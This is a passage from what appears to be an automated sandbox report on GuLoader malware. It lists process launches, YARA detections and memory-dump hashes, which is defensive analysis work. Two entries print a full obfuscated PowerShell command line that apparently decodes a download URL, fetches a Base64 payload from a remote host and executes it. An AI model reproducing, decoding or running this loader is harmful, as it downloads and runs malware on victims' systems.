karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. 
');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi 
DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;"
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:14:12:37
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:14:12:40
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
                                                                                Imagebase:0x7ff6b14d0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:14:12:49
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. 
karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. 
');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi 
DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;"
                                                                                Imagebase:0x200000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2409553300.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2407208321.00000000061C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2418645721.000000000966A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:14:12:51
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
                                                                                Imagebase:0x790000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:9
                                                                                Start time:14:13:06
                                                                                Start date:23/05/2024
                                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                Imagebase:0x5a0000
                                                                                File size:516'608 bytes
                                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2599908602.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 29566466c4af069494614804e921394a32bf39fbdc339e16b5a8e35b0669f154
                                                                                  • Instruction ID: 40e8535fda9a2ea5e302207f25dbbbc0d01320858ffa726113a63ee84c5802c1
                                                                                  • Opcode Fuzzy Hash: 29566466c4af069494614804e921394a32bf39fbdc339e16b5a8e35b0669f154
                                                                                  • Instruction Fuzzy Hash: 99F1913091CA8D8FEBA8EF28C8557E937E1FF54350F04426AE84DC72D5DB3899858B85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2599908602.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bd9cdcce5c6524b19cf0955f6922ca9396d2a53624fb0c9268e8270971ad5392
                                                                                  • Instruction ID: 3629aa4eaac2e85ba8be8700685a652fc0064ba4e2067e50a3a2b3a11e478ebf
                                                                                  • Opcode Fuzzy Hash: bd9cdcce5c6524b19cf0955f6922ca9396d2a53624fb0c9268e8270971ad5392
                                                                                  • Instruction Fuzzy Hash: D3E1B130A1CA4D8FEBA8EF28C8557E977E1FB54350F14426EE84DC7295CF78A8458B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2600722223.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1167cc16856d9c3f952f786fc73d41ba5f04ef044daece010799d2367dbdde50
                                                                                  • Instruction ID: 4306c538753bce10e363e5594ea5f936bde10891ecb3419f4dacaa592e4d9d20
                                                                                  • Opcode Fuzzy Hash: 1167cc16856d9c3f952f786fc73d41ba5f04ef044daece010799d2367dbdde50
                                                                                  • Instruction Fuzzy Hash: 4D121431D1EECA4FE756EB2858652B57BE1EF662A0F0801FED049C71D3DB1CA8068356
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2600722223.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2d337f55bd2a679bf2309a263f2916963ca299e61e813068f667d3c174998fba
                                                                                  • Instruction ID: 706de69da044cff6477e2620df48eaec49d675a73e82dd531a390a465f4dc966
                                                                                  • Opcode Fuzzy Hash: 2d337f55bd2a679bf2309a263f2916963ca299e61e813068f667d3c174998fba
                                                                                  • Instruction Fuzzy Hash: 11C12471E0EA8A4FE795EB2858256B97BE1EF5A2A0F4801FBC04DC71D3DE1CB8018355
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2599908602.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ad9af4a188a9ab77ca1e037329adac9c7823d1e7dee10c228b60ab2ef62342e
                                                                                  • Instruction ID: 220aa7d8b41198995d8874897ecb6218aee16e36c035562e59cf1d2ec075224e
                                                                                  • Opcode Fuzzy Hash: 0ad9af4a188a9ab77ca1e037329adac9c7823d1e7dee10c228b60ab2ef62342e
                                                                                  • Instruction Fuzzy Hash: 63812730A1CA494FE788EB1CC495AB5B7E1FF99391F1005BDD08AC32A6EB25EC46C745
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2600722223.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed7d1e28f700ce0b13dada853a066841b30e6c516a6df7c148e7954e62368a7e
                                                                                  • Instruction ID: 95d352c9a09b5dd5aac01bc0e736b8a0bb2cf58a2c87fe22f53e71ba66f16153
                                                                                  • Opcode Fuzzy Hash: ed7d1e28f700ce0b13dada853a066841b30e6c516a6df7c148e7954e62368a7e
                                                                                  • Instruction Fuzzy Hash: 5A41DF31D1EE8A4FF795EB2858652B96AE1FF653A0F5800BED00CC71D2DE1CA840835A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2600722223.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d63afd334a41556fe7e08610c861da89389d725c10b809ead7bf55f9b6179342
                                                                                  • Instruction ID: d6a6e71de060d383465a78c80cd3972a42a6220bad223a0c042cb2ce85d878f2
                                                                                  • Opcode Fuzzy Hash: d63afd334a41556fe7e08610c861da89389d725c10b809ead7bf55f9b6179342
                                                                                  • Instruction Fuzzy Hash: 8A31B032D1EA865FF3A5A7281825378A6E1FF09691F9801BAD44DD31D2EE0C7814825A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2599908602.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: 1d263df139ee799e0221237225f3f4c5236a0ef0a202e971a2d53809691abd9b
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: 2501677111CB0C4FDB44EF0CE451AA5B7E0FB95364F50056EE58AC3695D736E881CB45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94be41b7e1e48891ca18f33fc6f0e602a8c66dd99f0cdbad246dc4b1c86954e1
                                                                                  • Instruction ID: ccfe0cf5210d410c3b84cc1d3ce1ad658206e67ee69ca7f33c9b323262a03c81
                                                                                  • Opcode Fuzzy Hash: 94be41b7e1e48891ca18f33fc6f0e602a8c66dd99f0cdbad246dc4b1c86954e1
                                                                                  • Instruction Fuzzy Hash: 6DB15E70E00249DFDB14CFADC88579DBBF2BF88328F149569D815E7254EB74A841CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2402935637.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_4e70000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8adc18eb5a62d231b4c6a8dc519391c9302470973d965465c3901380bda277a3
                                                                                  • Instruction ID: 8f6a2fbede19fc496b3fc9b7f33bb771712bfd2a78a8ba33037bed44b42ce039
                                                                                  • Opcode Fuzzy Hash: 8adc18eb5a62d231b4c6a8dc519391c9302470973d965465c3901380bda277a3
                                                                                  • Instruction Fuzzy Hash: 8DB15F70E00209DFDB10CFA9D9857EDBBF2BF88328F149529E815E7254EB74A845CB81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$x.]k$x.]k$x.]k$-]k$-]k
                                                                                  • API String ID: 0-184526528
                                                                                  • Opcode ID: b9c173078eef6b4d2ab7a763dfb3e1b94a7d95487c4d4086562a8eaafeacbfd6
                                                                                  • Instruction ID: ecb942d91d5e4e24ac7e563e514f133150d99cd906ab0963713a29ee5ae96f6d
                                                                                  • Opcode Fuzzy Hash: b9c173078eef6b4d2ab7a763dfb3e1b94a7d95487c4d4086562a8eaafeacbfd6
                                                                                  • Instruction Fuzzy Hash: C26282B0A402198FDB24DB68C950BEEBBB2FF84700F1084D9D9096B355CB75AE85CF95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2411371365.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
